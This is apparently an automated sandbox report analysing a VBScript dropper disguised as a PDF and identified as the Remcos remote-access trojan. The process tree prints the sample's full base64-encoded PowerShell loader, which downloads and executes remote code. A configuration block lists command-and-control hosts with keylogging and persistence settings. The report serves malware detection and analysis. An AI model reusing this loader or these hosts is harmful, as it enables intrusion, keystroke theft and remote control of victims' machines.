Edit tour
Windows
Analysis Report
Aktarma,pdf.vbs
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 524 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Aktar ma,pdf.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2020 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $hamminess es = 'JGxp dGVyYWxpdH kgPSAnaHR0 cHM6Ly9yZX MuY2xvdWRp bmFyeS5jb2 0vZHl0Zmx0 NjFuL2ltYW dlL3VwbG9h ZC92MTczMz EzNDk0Ny9i a2xweXNleW V1dDRpbXB3 NTBuMS5qcG cnOyRob2Vj YWtlID0gTm V3LU9iamVj dCBTeXN0ZW 0uTmV0Lldl YkNsaWVudD skY29nbm9t ZW5zID0gJG hvZWNha2Uu RG93bmxvYW REYXRhKCRs aXRlcmFsaX R5KTskY2Fy YmFuaW9uID 0gW1N5c3Rl bS5UZXh0Lk VuY29kaW5n XTo6VVRGOC 5HZXRTdHJp bmcoJGNvZ2 5vbWVucyk7 JHRlbGVwaG 9uaWNhbGx5 ID0gJzw8Qk FTRTY0X1NU QVJUPj4nOy RleGNsdXNv cnkgPSAnPD xCQVNFNjRf RU5EPj4nOy RzY29vcCA9 ICRjYXJiYW 5pb24uSW5k ZXhPZigkdG VsZXBob25p Y2FsbHkpOy Rib3dsZWdn ZWQgPSAkY2 FyYmFuaW9u LkluZGV4T2 YoJGV4Y2x1 c29yeSk7JH Njb29wIC1n ZSAwIC1hbm QgJGJvd2xl Z2dlZCAtZ3 QgJHNjb29w OyRzY29vcC ArPSAkdGVs ZXBob25pY2 FsbHkuTGVu Z3RoOyRiZX doaXNrZXJl ZCA9ICRib3 dsZWdnZWQg LSAkc2Nvb3 A7JGZlc3Rv b25lcnkgPS AkY2FyYmFu aW9uLlN1Yn N0cmluZygk c2Nvb3AsIC RiZXdoaXNr ZXJlZCk7JH Byb3RldXNl cyA9IC1qb2 luICgkZmVz dG9vbmVyeS 5Ub0NoYXJB cnJheSgpIH wgRm9yRWFj aC1PYmplY3 QgeyAkXyB9 KVstMS4uLS gkZmVzdG9v bmVyeS5MZW 5ndGgpXTsk ZWxlbWlzID 0gW1N5c3Rl bS5Db252ZX J0XTo6RnJv bUJhc2U2NF N0cmluZygk cHJvdGV1c2 VzKTskc3Bv cmFkaWMgPS BbU3lzdGVt LlJlZmxlY3 Rpb24uQXNz ZW1ibHldOj pMb2FkKCRl bGVtaXMpOy RkdXBwaW5n ID0gW2RubG liLklPLkhv bWVdLkdldE 1ldGhvZCgn VkFJJyk7JG R1cHBpbmcu SW52b2tlKC RudWxsLCBA KCcwL24xQ1 pUL3IvZWUu ZXRzYXAvLz pzcHR0aCcs ICckc2NoZW R1bGVycycs ICckc2NoZW R1bGVycycs ICckc2NoZW R1bGVycycs ICdNU0J1aW xkJywgJyRz Y2hlZHVsZX JzJywnJHNj aGVkdWxlcn MnLCckc2No ZWR1bGVycy csJ1VSTCcs ICdDOlxQcm 9ncmFtRGF0 YVwnLCdjbG Fzc2Vycycs J3ZicycsJz EnLCcxJykp Ow==';$sti ckhandled = [System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring($ham minesses)) ;Invoke-Ex pression $ stickhandl ed MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7520 cmdline:
"C:\Window s\System32 \cmd.exe" /C copy *. vbs "C:\Pr ogramData\ classers.v bs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7532 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - MSBuild.exe (PID: 7696 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - MSBuild.exe (PID: 7704 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- wscript.exe (PID: 7648 cmdline:
wscript.ex e C:\Progr amData\cla ssers.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
- svchost.exe (PID: 8064 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "sun.drillmmcsnk.eu:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghghyrtssxr-7RL1P2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Click to see the 10 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |